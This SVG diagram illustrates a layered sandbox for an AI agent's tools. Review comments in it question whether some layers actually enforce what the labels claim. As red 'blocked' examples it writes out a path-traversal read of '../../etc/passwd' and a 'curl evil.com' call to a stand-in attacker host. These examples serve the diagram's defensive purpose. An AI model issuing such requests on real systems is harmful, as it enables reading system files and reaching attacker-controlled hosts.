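| <svg viewBox="0 0 720 380" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Layered sandbox: each ring rejects a class of unsafe operations before tools run."> |
| <!-- Diagram of a layered tool sandbox: four nested boxes, three rejected example requests (red, dashed) and one accepted request (green). --> |
| <defs> |
| <style> |
| text { font-family: 'JetBrains Mono', 'Fira Code', 'SF Mono', Consolas, monospace; } |
| .title { font-size: 14px; fill: #c9d1d9; font-weight: 700; } |
| .layer { font-size: 12px; fill: #c9d1d9; font-weight: 700; } |
| .dim { font-size: 10px; fill: #8b949e; } |
| .ok { font-size: 11px; fill: #3fb950; font-weight: 700; } |
| .deny { font-size: 11px; fill: #f85149; font-weight: 700; } |
| .ring1 { fill: #161b22; stroke: #30363d; stroke-width: 1; } |
| .ring2 { fill: #1c2128; stroke: #30363d; stroke-width: 1; } |
| .ring3 { fill: #21262d; stroke: #30363d; stroke-width: 1; } |
| .ring4 { fill: #1f2937; stroke: #58a6ff; stroke-width: 1.5; } |
| .denyline { stroke: #f85149; stroke-width: 1.5; fill: none; stroke-dasharray: 4 3; } |
| .okline { stroke: #3fb950; stroke-width: 1.5; fill: none; } |
| </style> |
| <!-- Arrowheads: #dx (red) terminates the rejected-request lines, #ok (green) terminates the accepted one. --> |
| <marker id="dx" markerWidth="9" markerHeight="9" refX="7" refY="4" orient="auto"> |
| <path d="M0,0 L8,4 L0,8 z" fill="#f85149"/> |
| </marker> |
| <marker id="ok" markerWidth="9" markerHeight="9" refX="7" refY="4" orient="auto"> |
| <path d="M0,0 L8,4 L0,8 z" fill="#3fb950"/> |
| </marker> |
| </defs> |
|
|
| <!-- Opaque background covering the whole 720x380 viewBox. --> |
| <rect width="720" height="380" fill="#0d1117"/> |
|
|
| <text x="30" y="32" class="title">Layered sandbox</text> |
| <text x="30" y="50" class="dim">Each ring blocks a different class of unsafe call before it ever reaches the OS.</text> |
|
|
| <!-- Rings, outermost first. Each rect has an opaque fill, so document order is paint order: keep outer rings before inner ones. --> |
| <!-- Ring 1. NOTE(review): the label describes a lexical check (../ and absolute paths); whether safe_path() also resolves symlinks before comparing against the workspace root is not shown here. Confirm. --> |
| <rect class="ring1" x="200" y="80" width="360" height="270" rx="10"/> |
| <text x="218" y="100" class="layer">Workspace boundary</text> |
| <text x="218" y="116" class="dim">safe_path() rejects ../ and absolute paths</text> |
|
|
| <!-- Ring 2. NOTE(review): an allowlist of command names does not by itself constrain arguments; ls, cat and rg all take paths, so their arguments presumably need the ring 1 path check as well. Confirm in exec_cmd. --> |
| <rect class="ring2" x="240" y="135" width="280" height="200" rx="8"/> |
| <text x="258" y="155" class="layer">Command allowlist</text> |
| <text x="258" y="170" class="dim">exec_cmd: only ls, cat, rg, …</text> |
|
|
| <!-- Ring 3. NOTE(review): clip(result, MAX_CHARS) takes a result, so this layer presumably runs after the tool and truncates rather than rejects; the caption's "before it ever reaches the OS" would then apply to rings 1 and 2 only. Confirm. --> |
| <rect class="ring3" x="280" y="190" width="200" height="125" rx="6"/> |
| <text x="298" y="210" class="layer">Output cap</text> |
| <text x="298" y="225" class="dim">clip(result, MAX_CHARS)</text> |
|
|
| <!-- Ring 4 (innermost). NOTE(review): the label shows exec(code, …); if that is in-process evaluation of supplied code, the three outer checks do not confine what the code itself can do. Confirm what isolation applies at this point. --> |
| <rect class="ring4" x="320" y="240" width="120" height="60" rx="6"/> |
| <text x="345" y="265" class="layer">Tool runs</text> |
| <text x="338" y="282" class="dim">exec(code, …)</text> |
|
|
| <!-- Rejected examples. Each dashed line ends 4 units left of the ring it is meant to violate (x=196, 236, 276 against ring edges at 200, 240, 280). --> |
| <text x="30" y="100" class="deny">../../etc/passwd</text> |
| <path d="M 30 110 L 196 145" class="denyline" marker-end="url(#dx)"/> |
|
|
| <text x="30" y="170" class="deny">curl evil.com</text> |
| <path d="M 30 175 L 236 200" class="denyline" marker-end="url(#dx)"/> |
|
|
| <text x="30" y="240" class="deny">read 999999 chars</text> |
| <path d="M 30 245 L 276 245" class="denyline" marker-end="url(#dx)"/> |
|
|
| <!-- Accepted example. The label is right-aligned at x=710: starting it at x=600, 22 monospace characters at 11px run past the 720-wide viewBox and get clipped. The curve ends at (442, 268), just outside the right edge of ring 4 (x=440). --> |
| <text x="710" y="100" class="ok" text-anchor="end">read_file("README.md")</text> |
| <path d="M 690 110 C 600 130 500 200 442 268" class="okline" marker-end="url(#ok)"/> |
|
|
| <!-- Legend. --> |
| <text x="30" y="350" class="dim">red = blocked at the first ring it violates · green = passes every ring and reaches the tool</text> |
| </svg> |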
|
|